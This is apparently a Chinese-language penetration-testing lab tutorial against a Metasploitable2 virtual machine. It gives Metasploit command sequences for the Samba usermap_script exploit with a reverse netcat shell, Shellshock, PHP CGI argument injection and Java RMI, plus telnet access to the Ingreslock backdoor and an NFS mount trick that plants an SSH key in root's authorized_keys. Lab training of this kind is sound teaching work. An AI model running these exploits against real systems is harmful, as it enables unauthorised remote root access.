漏洞利⽤六:Linux系统漏洞利⽤
准备:直接⽤⼀个⼯具包,在虚拟机上直接打开Linux环境。此虚拟机为靶机。
账号:msfadmin        密码:msfadmin
设权限sudo passwd root      改root密码:msfadmin
切换权限:su root      输密码:msfafmin
重启⽹卡:/etc/init.d/networking restart
xshell连接地址:192.168.1.103(桥接)
⼀、利⽤samba 服务漏洞⼊侵linux主机(samba低版本),对应端⼝:139、445
靶机IP:192.168.1.103
查看本地服务:netstat -lnt
结合nessus扫描本机的结果出现的漏洞,进⾏攻击。
攻击机:kali,IP:10.0.0.9
1.msfconsole
search samba
use exploit/multi/samba/usermap_script
set payload cmd/unix/reverse_netcat
show options
set rhosts 192.168.1.103
exploit
成功后可在本地直接输⼊命令操控对⽅。
⼆、CVE-2014-6271      Bash Shellshock(破壳)
Shellshock的原理是利⽤了Bash在导⼊环境变量函数时候的漏洞,启动Bash的时候,它不但会导⼊这个函数,⽽且也会把函数定义后⾯的命令执⾏。在有些CGI脚本的设计中,数据是通过环境变量来传递的,这样就给了数据提供者利⽤Shellshock漏洞的机会。简单来说就是由于服务器的cgi脚本调⽤了bash命令,由于bash版本过低,攻击者把有害数据写⼊环境变量,传到服务器端,触发服务器运⾏Bash 脚本,完成攻击。cgi格式⽂件是“公共⽹关接⼝脚本”类型⽂件。
1.准备环境
靶机:metasploitable2(kali)系统,IP:192.168.1.103。
攻击机:kali,IP:10.0.0.9。
2.靶机上⾯
cd /usr/lib/cgi-bin/
(创建hello.sh⽂件:)
sudo nano hello.sh
(ctrl+x退出)(⽤vim对hello.sh脚本进⾏编辑:vim hello.sh)#! /bin/bash
echo "Content-type: text/html"
echo ""
echo "Hello world!"
(:wq保存)
(保存好后,赋予脚本可执⾏权限,使⽤chmod命令:)
sudo chmod 755 hello.sh
(通过浏览器访问该脚本,可以看到成功执⾏,可以攻击)
3.进⼊攻击机msfconsole。
search CVE-2014-6271cve漏洞库
use exploit/multi/http/apache_mod_cgi_bash_env_exec show options
set rhost 192.168.1.103
set targeturi /cgi-bin/hello.sh
exploit
三、PHP CGI漏洞
1.准备环境
靶机:同上
攻击机kali,IP:10.0.0.9。
2.search cve:2012-1823
use exploit/multi/http/php_cgi_arg_injection
show options
set rhost 192.168.1.103
exploit
四、Java RMI SERVER 命令执⾏漏洞与java cve-2013-0422
nmap –p 0-65535 IP      #查看1099端⼝是否开启
use exploit/multi/misc/java_rmi_server
五、Ingreslock  后门
原理:Ingreslock后门监听1524端⼝,连接1524端⼝就可以直接提取root权限。
验证:在本地机上  Telnet 192.168.1.103 1524
六、NFS Exported Share Information Disclosure
rpcinfo -p 192.168.1.103                    #显⽰本地系统中注册到rpcbind协议版本2的所有RPC服务
showmount -e 192.168.1.103              #显⽰被挂载的共享⽬录ssh-keygen                                            #⽣成密钥
默认密钥保存地址  (/root/.ssh/id_rsa.pub)
mkdir /tmp/test
mount -t nfs 192.168.1.103:/ /tmp/test
cat /root/.ssh/id_rsa.pub>>/tmp/test/root/.ssh/authorized_keys ssh root@192.168.1.103
相当于远程连接

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。